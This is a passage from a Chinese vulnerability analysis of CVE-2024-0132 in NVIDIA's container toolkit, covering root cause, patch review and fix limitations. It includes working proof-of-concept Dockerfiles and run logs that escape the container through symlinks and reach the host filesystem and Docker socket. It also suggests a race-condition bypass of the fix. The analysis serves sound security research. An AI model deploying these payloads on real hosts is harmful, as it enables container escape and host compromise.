ENV NVIDIA_DRIVER_CAPABILITIES=all

CMD /entrypoint.sh
root@wanglei-gpu:~/poc-procfs# cat entrypoint.sh 
#!/bin/bash
set -x
#echo '[+] mounted host files'
#echo '[+] reading /etc/hostname'
cat /host/etc/hostname
#echo 'mounted docker.sock; reading containers'
curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc-procfs# ls
Dockerfile  entrypoint.sh
root@wanglei-gpu:~/poc-procfs# docker build -t ssst0n3/poc-cve-2024-0132:proc .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  3.584kB
Step 1/8 : FROM ubuntu
 ---> b1d9df8ab815
Step 2/8 : RUN apt update && apt install curl -y
 ---> Using cache
 ---> 22cff36a341c
Step 3/8 : WORKDIR /usr/local/cuda/compat
 ---> Using cache
 ---> d13208243e8f
Step 4/8 : RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 &&     ln -s / /usr/lib/libnvidia-ml.so.1 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host
 ---> Using cache
 ---> 6371e6b56cab
Step 5/8 : RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 &&     ln -s /run /usr/lib64/libnvidia-cfg.so.1 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run
 ---> Running in 6d3f1fb775b2
Removing intermediate container 6d3f1fb775b2
 ---> 24cfef3630d3
Step 6/8 : COPY entrypoint.sh /
 ---> 473de3b01d8f
Step 7/8 : ENV NVIDIA_DRIVER_CAPABILITIES=all
 ---> Running in 215739d1c861
Removing intermediate container 215739d1c861
 ---> ab62217ce62b
Step 8/8 : CMD /entrypoint.sh
 ---> Running in 358b01f5a7e5
Removing intermediate container 358b01f5a7e5
 ---> e8b3b6adb292
Successfully built e8b3b6adb292
Successfully tagged ssst0n3/poc-cve-2024-0132:proc
root@wanglei-gpu:~# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132:proc
+ cat /host/etc/hostname
wanglei-gpu
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"a84e9812921f2a49541982607b0488f3b9bc8bd04ae074c6b65f5546761a1367","Names":["/keen_wu"],"Image":"ssst0n3/poc-cve-2024-0132:proc","ImageID":"sha256:e8b3b6adb292f3732662e09d721b6ae20d52b4e8d3ae54037917d3fcae6d1418","Command":"/bin/sh -c /entrypoint.sh","Created":1734014316,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"bf50a193cce8ba008eb132b957d511300b626e85b0d8e3150d4264a6da75e19d","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
3.3.3 两次挂载方法
  1. 构造软链接: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> /
  2. 构造软链接: /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112

完整PoC如下, 利用效果也很理想:

root@wanglei-gpu:~/poc-2mounts# cat Dockerfile 
FROM ubuntu

RUN apt update && apt install curl -y

WORKDIR /usr/local/cuda/compat

RUN mkdir libnvidia-cfg.so.111 &&
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 &&
    ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 &&
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run

CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json
root@wanglei-gpu:~/poc-2mounts# docker build -t ssst0n3/poc-cve-2024-0132-ym .
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  3.072kB
Step 1/5 : FROM ubuntu
 ---> b1d9df8ab815
Step 2/5 : RUN apt update && apt install curl -y
 ---> Using cache
 ---> 77fb95a6fc52
Step 3/5 : WORKDIR /usr/local/cuda/compat
 ---> Using cache
 ---> 311a3960cc5f
Step 4/5 : RUN mkdir libnvidia-cfg.so.111 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 libnvidia-cfg.so.113 &&     ln -s /run libnvidia-cfg.so.111/libnvidia-cfg.so.112 &&     ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.112 /host-run
 ---> Using cache
 ---> dcc8fbd93574
Step 5/5 : CMD sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json
 ---> Using cache
 ---> fc14d064757d
Successfully built fc14d064757d
Successfully tagged ssst0n3/poc-cve-2024-0132-ym:latest
root@wanglei-gpu:~/poc-2mounts# docker run -ti --rm --runtime nvidia --gpus=all ssst0n3/poc-cve-2024-0132-ym
[{"Id":"d45013b4c5293030f9c01929e81b69d1af0d676a44d230710c8a97baef394758","Names":["/friendly_perlman"],"Image":"ssst0n3/poc-cve-2024-0132-ym","ImageID":"sha256:fc14d064757d9b17bf6454e06fe63af49f17fbd95391158908625142def35c86","Command":"/bin/sh -c 'sleep 0.1 && curl --unix-socket /host-run/docker.sock http://localhost/containers/json'","Created":1736862952,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"c4573489d87e5162cf69495fcb6a4bb879c152012853d98d8ab202b0bf13e755","EndpointID":"a73ef57a093f3c18a4d0df8c5bc29f4b3d104e4653ce45a63216b81dc010dec1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]

4. 为什么 /proc/self/cwd 无法利用

/proc/self 是一个符号链接,指向 /proc/<当前进程的PID>。

仅进入 Mount 命名空间,导致文件系统视图(包括 /proc)切换到容器的视图,但进程仍然在宿主机的 PID 命名空间中,因此无法正常显示 /proc/self 目录。

可以将问题简化为使用 nsenter -m 进入容器的mount namespace, 将发现无法访问 /proc/self

root@wanglei-gpu:~# docker run -tid ubuntu sleep 7777
70c6ac9b97277217e13fecbc8ac8754e569b83b33a871236493a10b5ad291ca3
root@wanglei-gpu:~# ps -ef |grep 7777
root       30697   30677  0 22:51 pts/0    00:00:00 sleep 7777
root       30720   23331  0 22:51 pts/0    00:00:00 grep --color=auto 7777
root@wanglei-gpu:~# nsenter -t 30697 -m
root@wanglei-gpu:/# ls -lahd proc/1
dr-xr-xr-x 9 root root 0 Dec 12 14:51 proc/1
root@wanglei-gpu:/# ls -lahd proc/self
ls: cannot read symbolic link 'proc/self': No such file or directory
lrwxrwxrwx 1 root root 0 Dec 12 14:51 proc/self
root@wanglei-gpu:/# stat proc/self
  File: proc/selfstat: cannot read symbolic link 'proc/self': No such file or directory

  Size: 0          Blocks: 0          IO Block: 1024   symbolic link
Device: 0,65 Inode: 4026531842  Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-12-12 14:51:50.626149745 +0000
Modify: 2024-12-12 14:51:50.538149127 +0000
Change: 2024-12-12 14:51:50.538149127 +0000
 Birth: -
root@wanglei-gpu:/# stat proc/1
  File: proc/1
  Size: 0          Blocks: 0          IO Block: 1024   directory
Device: 0,65 Inode: 224269      Links: 9
Access: (0555/dr-xr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-12-12 14:51:50.626149745 +0000
Modify: 2024-12-12 14:51:50.626149745 +0000
Change: 2024-12-12 14:51:50.626149745 +0000
 Birth: -

但如果同时进入 pid namespace, 则可以访问 /proc/self。而父进程 nsenter 对容器内不可见。

root@wanglei-gpu:~# nsenter -t 30697 -m -p
root@wanglei-gpu:/# cat /proc/self/status 
Name: cat
Umask: 0022
State: R (running)
Tgid: 53015
Ngid: 0
Pid: 53015
PPid: 52992
...
root@wanglei-gpu:/# cat /proc/52992/status
Name: bash
Umask: 0022
State: S (sleeping)
Tgid: 52992
Ngid: 0
Pid: 52992
PPid: 0
...

5. 为什么 CDI 模式不受漏洞影响

根据章节 "七、漏洞分析-2.6 nvidia-container-runtime-hook 调用 nvidia-container-cli",cuda前向兼容特性在 nvidia-container-cli configure命令中被调用。

如章节 "七、漏洞分析-2.4 nvidia-container-runtime 具体会对 spec 修改什么"所述, CDI模式不会调用nvidia-container-cli configure

因为所有的配置已经更新到 spec 中了, 配置来源于 /etc/cdi/nvidia.yaml, 例如:

---
cdiVersion:0.5.0
containerEdits:
deviceNodes:
-path:/dev/nvidia-modeset
-path:/dev/nvidia-uvm
-path:/dev/nvidia-uvm-tools
-path:/dev/nvidiactl
env:
-NVIDIA_VISIBLE_DEVICES=void
hooks:
-args:
    -nvidia-cdi-hook
    -create-symlinks
    ---link
    -libnvidia-allocator.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-allocator.so.1
    ---link
    -../libnvidia-allocator.so.1::/usr/lib/x86_64-linux-gnu/gbm/nvidia-drm_gbm.so
    ---link
    -libnvidia-vulkan-producer.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-vulkan-producer.so
    ---link
    -libglxserver_nvidia.so.470.223.02::/usr/lib/xorg/modules/extensions/libglxserver_nvidia.so
    hookName:createContainer
    path:/usr/bin/nvidia-cdi-hook
-args:
    -nvidia-cdi-hook
    -update-ldcache
    ---folder
    -/usr/lib/x86_64-linux-gnu
    hookName:createContainer
    path:/usr/bin/nvidia-cdi-hook
mounts:
-containerPath:/run/nvidia-persistenced/socket
    hostPath:/run/nvidia-persistenced/socket
    options:
    -ro
    -nosuid
    -nodev
    -bind
    -noexec
...
-containerPath:/usr/bin/nvidia-persistenced
    hostPath:/usr/bin/nvidia-persistenced
    options:
    -ro
    -nosuid
    -nodev
    -bind
-containerPath:/usr/bin/nvidia-smi
    hostPath:/usr/bin/nvidia-smi
    options:
    -ro
    -nosuid
    -nodev
    -bind
...
devices:
-containerEdits:
    deviceNodes:
    -path:/dev/nvidia0
    -path:/dev/dri/card1
    -path:/dev/dri/renderD128
    hooks:
    -args:
      -nvidia-cdi-hook
      -create-symlinks
      ---link
      -../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      ---link
      -../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName:createContainer
      path:/usr/bin/nvidia-cdi-hook
    ...
name:"0"
-containerEdits:
    deviceNodes:
    -path:/dev/nvidia0
    -path:/dev/dri/card1
    -path:/dev/dri/renderD128
    hooks:
    -args:
      -nvidia-cdi-hook
      -create-symlinks
      ---link
      -../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      ---link
      -../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName:createContainer
      path:/usr/bin/nvidia-cdi-hook
    ...
name:GPU-86fd03a3-2937-0c87-3dff-26be693ec102
-containerEdits:
    deviceNodes:
    -path:/dev/nvidia0
    -path:/dev/dri/card1
    -path:/dev/dri/renderD128
    hooks:
    -args:
      -nvidia-cdi-hook
      -create-symlinks
      ---link
      -../card1::/dev/dri/by-path/pci-0000:00:0d.0-card
      ---link
      -../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render
      hookName:createContainer
      path:/usr/bin/nvidia-cdi-hook
    ...
name:all
kind:nvidia.com/gpu

八、漏洞引入分析

commit#35a9f27(https://github.com/NVIDIA/libnvidia-container/commit/35a9f27c0200d74fdccc43f893253439d1b969a5#diff-082d73ee31e0c92eac8fe9324cd6dca676357264ec3d36f934ba718dae93f6d1)

主要是功能实现,没有考虑到:

  1. 从容器mount文件到容器是一个敏感操作
  2. 未对软链接作限制(如果不熟悉容器安全,开发者可能很难想到)

九、漏洞修复分析

1. 修复分析

PR#282

1.1 增加函数 mount_in_root

添加了 mount_in_root 函数,如果目的路径在rootfs以外,则返回错误。

https://github.com/NVIDIA/libnvidia-container/commit/ad1f8c8ac4a31bef69c82958f3a87456ceaa39c8?diff=unified#diff-ad502ebe98b15d295b76f88ec8ff917a249b05151a3191db41e43f0390c70b2dR69-R77

src/nvc_mount.c

+static char *mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags);

+// mount_in_root bind mounts the specified src to the specified location in a root.
+// If the destination resolves outside of the root an error is raised.
+static char *
+mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags) {
+       char dst[PATH_MAX];
+       if (path_resolve_full(err, dst, rootfs, path) < 0)
+               return (NULL);
+       return mount_with_flags(err, src, dst, uid, gid, mountflags);
+}
int
path_resolve_full(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, true, buf, root, path));
}

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
        int fd = -1;
        int rv = -1;
        char realpath[PATH_MAX];
        char dbuf[2][PATH_MAX];
        char *link = dbuf[0];
        char *ptr = dbuf[1];
        char *file, *p;
        unsignedint noents = 0;
        unsignedint nlinks = 0;
        ssize_t n;

        *ptr = '';
        *realpath = '';
        assert(*root == '/');

        if ((fd = open_next(err, -1, root)) < 0)
                goto fail;
        if (path_append(err, ptr, path) < 0)
                goto fail;

        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '' || str_equal(file, "."))
                        continue;
                elseif (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */

                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        if (noents > 0)
                                goto missing_ent;

                        n = readlinkat(fd, file, link, PATH_MAX);
                        if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) {
                                /*
                                 * Component is a symlink, append the rest of the path to it and
                                 * proceed with the resulting buffer. If it is absolute, also clear
                                 * the resolved path and reset our file descriptor to root.
                                 */

                                link[n] = '';
                                if (*link == '/') {
                                        ++link;
                                        *realpath = '';
                                        if ((fd = open_next(err, fd, root)) < 0)
                                                goto fail;
                                }
                                if (ptr != NULL) {
                                        if (path_append(err, link, ptr) < 0)
                                                goto fail;
                                }
                                ptr = link;
                                link = dbuf[++nlinks % 2];
                        } else {
                                if (n >= PATH_MAX)
                                        errno = ENAMETOOLONG;
                                elseif (nlinks >= MAXSYMLINKS)
                                        errno = ELOOP;
                                switch (errno) {
                                missing_ent:
                                case ENOENT:
                                        /* Component doesn't exist */
                                        ++noents;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                case EINVAL:
                                        /* Not a symlink, proceed normally */
                                        if ((fd = open_next(err, fd, file)) < 0)
                                                goto fail;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                default:
                                        error_set(err, "path error: %s/%s", root, path);
                                        goto fail;
                                }
                        }
                }
        }

        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;

 fail:
        xclose(fd);
        return (rv);
}

1.2 替换 mount_with_flags 为 mount_in_root

src/nvc_mount.c

static char *
mount_directory(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir)
{
        char src[PATH_MAX];
-       char dst[PATH_MAX];
        if (path_join(err, src, root, dir) < 0)
                return (NULL);
-       if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
-               return (NULL);
-       return mount_with_flags(err, src, dst, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);
+       return mount_in_root(err, src, cnt->cfg.rootfs, dir, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);
}

// mount_firmware mounts the specified firmware file. The path specified is the container path and is resolved
// on the host before mounting.
static char *
mount_firmware(struct error *err, const char *root, const struct nvc_container *cnt, const char *container_path)
{
        char src[PATH_MAX];
-       char dst[PATH_MAX];
        if (path_resolve_full(err, src, root, container_path) < 0)
                return (NULL);
-       if (path_join(err, dst, cnt->cfg.rootfs, container_path) < 0)
-               return (NULL);
+       return mount_in_root(err, src, cnt->cfg.rootfs, container_path, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID);
}

1.3 添加函数 file_mode_nofollow

相较于 file_mode, file_mode_nofollow 将 stat 替换为了 lstat,以避免解析软链接。

src/utils.h

+int  file_mode_nofollow(struct error *, const char *, mode_t *);

src/utils.c

+// file_mode_nofollow implements the same functionality as file_mode except that
+// in that case of a symlink, the file is not followed and the mode of the
+// original file is returned.
+int
+file_mode_nofollow(struct error *err, const char *path, mode_t *mode)
+{
+       struct stat s;
+       if (xlstat(err, path, &s) < 0)
+               return (-1);
+       *mode = s.st_mode;
+       return (0);
+}

src/xfuncs.h

+static inline int  xlstat(struct error *, const char *, struct stat *);
...
+static inline int
+xlstat(struct error *err, const char *path, struct stat *buf)
+{
+        int rv;
+        if ((rv = lstat(path, buf)) < 0)
+                error_set(err, "lstat failed: %s", path);
+        return (rv);
+}

1.4 替换 file_mode 为 file_mode_nofollow

static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
        char src[PATH_MAX];
        char dst[PATH_MAX];
        mode_t mode;
        char *src_end, *dst_end, *file;
        char **mnt, **ptr;

        if (path_new(err, src, root) < 0)
                return (NULL);
        if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
                return (NULL);
        if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
                return (NULL);
+       if (path_new(err, dst, dir) < 0)
+               return (NULL);
        src_end = src + strlen(src);
        dst_end = dst + strlen(dst);

        mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
        if (mnt == NULL)
                return (NULL);

        for (size_t i = 0; i < size; ++i) {
                file = basename(paths[i]);
                if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                        continue;
                if (path_append(err, src, paths[i]) < 0)
                        goto fail;
-               if (path_append(err, dst, file) < 0)
-                       goto fail;
-               if (file_mode(err, src, &mode) < 0)
+               if (file_mode_nofollow(err, src, &mode) < 0)
                        goto fail;
-               if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
+               // If we encounter resolved directories or symlinks here, we raise an error.
+               if (S_ISDIR(mode) || S_ISLNK(mode)) {
+                       error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]);
                        goto fail;
-               log_infof("mounting %s at %s", src, dst);
-               if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
-                       goto fail;
-               if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
+               }
+               if (path_append(err, dst, file) < 0)
                        goto fail;
-               if ((*ptr++ = xstrdup(err, dst)) == NULL)
+               if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL)
                        goto fail;
                *src_end = '';
                *dst_end = '';
        }
        return (mnt);

 fail:
        for (size_t i = 0; i < size; ++i)
                unmount(mnt[i]);
        array_free(mnt, size);
        return (NULL);
}

src/utils.c

int
file_create(struct error *err, const char *path, const char *data, uid_t uid, gid_t gid, mode_t mode)
{
        char *p;
        uid_t euid;
        gid_t egid;
        mode_t perm;
        int fd;
        size_t size;
        int flags = O_NOFOLLOW|O_CREAT;
        int rv = -1;

        // We check whether the file already exists with the required mode and skip the creation.
-       if (data == NULL && file_mode(err, path, &perm) == 0) {
+       if (data == NULL && file_mode_nofollow(err, path, &perm) == 0) {
                if (perm == mode) {
-                       log_errf("The path %s already exists with the required mode; skipping create", path);
+                       log_warnf("The path %s already exists with the required mode; skipping create", path);
                        return (0);
                }
        }

        if ((p = xstrdup(err, path)) == NULL)
                return (-1);

        /*
         * Change the filesystem UID/GID before creating the file to support user namespaces.
         * This is required since Linux 4.8 because the inode needs to be created with a UID/GID known to the VFS.
         */
        euid = geteuid();
        egid = getegid();
        if (set_fsugid(uid, gid) < 0)
                goto fail;

        perm = (0777 & ~get_umask()) | S_IWUSR | S_IXUSR;
        if (make_ancestors(dirname(p), perm) < 0)
                goto fail;
        perm = 0777 & ~get_umask() & mode;

        if (S_ISDIR(mode)) {
                if (mkdir(path, perm) < 0 && errno != EEXIST)
                        goto fail;
        } else if (S_ISLNK(mode)) {
                if (data == NULL) {
                        errno = EINVAL;
                        goto fail;
                }
                if (symlink(data, path) < 0 && errno != EEXIST)
                        goto fail;
        } else {
                if (data != NULL) {
                        size = strlen(data);
                        flags |= O_WRONLY|O_TRUNC;
                }
                if ((fd = open(path, flags, perm)) < 0) {
                        if (errno == ELOOP)
                                errno = EEXIST; /* XXX Better error message if the file exists and is a symlink. */
                        goto fail;
                }
                if (data != NULL && write(fd, data, size) < (ssize_t)size) {
                        close(fd);
                        goto fail;
                }
                close(fd);
        }
        rv = 0;

 fail:
        if (rv < 0)
                error_set(err, "file creation failed: %s", path);

        assert_func(set_fsugid(euid, egid));
        free(p);
        return (rv);
}

2. 修复效果验证

2.1 复现环境

环境同 ”六、漏洞复现-1. nvidia-container-toolkit-1.1 复现环境“ 。

安装 docker, nvidia-container-toolkit

root@wanglei-gpu:~# apt update && apt install docker.io -y
root@wanglei-gpu:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list |
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' |
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu:~# apt-get update &&
    apt-get install -y libnvidia-container1=1.16.2-1
    libnvidia-container-tools=1.16.2-1
    nvidia-container-toolkit-base=1.16.2-1
    nvidia-container-toolkit=1.16.2-1

配置容器运行时 nvidia

root@wanglei-gpu:~# nvidia-ctk runtime configure --runtime=docker
INFO[0000] Config file does not exist; using empty config 
INFO[0000] Wrote updated config to /etc/docker/daemon.json 
INFO[0000] It is recommended that docker daemon be restarted. 
root@wanglei-gpu:~# systemctl restart docker

环境信息如下

root@wanglei-gpu:~# nvidia-container-cli --version
cli-version: 1.16.2
lib-version: 1.16.2
build date: 2024-09-24T20:48+00:00
build revision: 921e2f3197385173cf8670342e96e98afe9b3dd3
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu:~
root@wanglei-gpu:~# nvidia-container-cli info
NVRM version:   470.223.02
CUDA version:   11.4

Device Index:   0
Device Minor:   0
Model:          Tesla T4
Brand:          Nvidia
GPU UUID:       GPU-86fd03a3-2937-0c87-3dff-26be693ec102
Bus Location:   00000000:00:0d.0
Architecture:   7.5
root@wanglei-gpu:~
root@wanglei-gpu:~# docker info
Client:
 Version:    24.0.7
 Context:    default
 Debug Mode: false

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 0
 Server Version: 24.0.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 nvidia runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 
 runc version: 
 init version: 
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 5.15.0-76-generic
 Operating System: Ubuntu 22.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 8
 Total Memory: 31.15GiB
 Name: wanglei-gpu
 ID: 611fe373-3040-4a95-96bc-cff83017766f
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

2.2 修复效果验证

使用预先构建的poc镜像 ssst0n3/poc-cve-2024-0132 或临时构建,同样的poc无法再利用。

root@wanglei-gpu:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu:~# cd poc-cve-2024-0132/
root@wanglei-gpu:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
root@wanglei-gpu:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error running hook #0: error running hook: exit status 1, stdout: , stderr: Auto-detected mode as 'legacy'
nvidia-container-cli: mount error: unexpected source file mode 120777 for /proc/1/cwd/usr/lib/libnvidia-ml.so.1: unknown.
ERRO[0000] error waiting for container:

4. 当前修复局限性

4.1 file_mode_nofollow: 条件竞争

file_mode_nofollow 检查了软链接场景,但可以通过共享卷和软链接条件竞争绕过。

static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
  ...
for (size_t i = 0; i < size; ++i) {
          file = basename(paths[i]);
          if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                  continue;
          if (path_append(err, src, paths[i]) < 0)
                  goto fail;
          if (file_mode_nofollow(err, src, &mode) < 0)
                  goto fail;
          // If we encounter resolved directories or symlinks here, we raise an error.
          if (S_ISDIR(mode) || S_ISLNK(mode)) {
                  error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]);
                  goto fail;
          }
          if (path_append(err, dst, file) < 0)
                  goto fail;
          if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL)
                  goto fail;
          *src_end = '';
          *dst_end = '';
  }
  ...
}

4.2 mount_in_root

mount_in_root 函数是,如果目的路径在rootfs以外则返回错误,但实际仅在路径中出现 .. 时才会触发, 在路径可以是软链接时似乎没什么防护效果。

// mount_in_root bind mounts the specified src to the specified location in a root.
// If the destination resolves outside of the root an error is raised.
static char *
mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags) 
{
       char dst[PATH_MAX];
       if (path_resolve_full(err, dst, rootfs, path) < 0)
               return (NULL);
       return mount_with_flags(err, src, dst, uid, gid, mountflags);
}
int
path_resolve_full(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, true, buf, root, path));
}

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
 ...
        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '' || str_equal(file, "."))
                        continue;
                elseif (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */

                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        ...
                }
        }

        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;

 fail:
        xclose(fd);
        return (rv);
}

5. 该修复有无引入新漏洞

未引入新漏洞。

十、漏洞挖掘方法与过程

1. 原作者的漏洞挖掘方法

推测作者的挖掘方法如下:

  1. 拿到一个新的容器运行时,首先关注mount系统调用
  2. 通过代码审计发现 cuda 前向兼容特性,允许从容器路径挂载到容器路径,而容器路径容易被攻击者控制
  3. 尝试软链接攻击

2. 有无可能早于作者或业界发现

有可能:

  1. 我在业界无公开细节的情况下,独立复现了漏洞,证明具备相应的能力
  2. 2024年初曾计划过nvidia-container-runtime的漏洞挖掘项目,但优先级不高,尚未实际开展漏洞挖掘工作

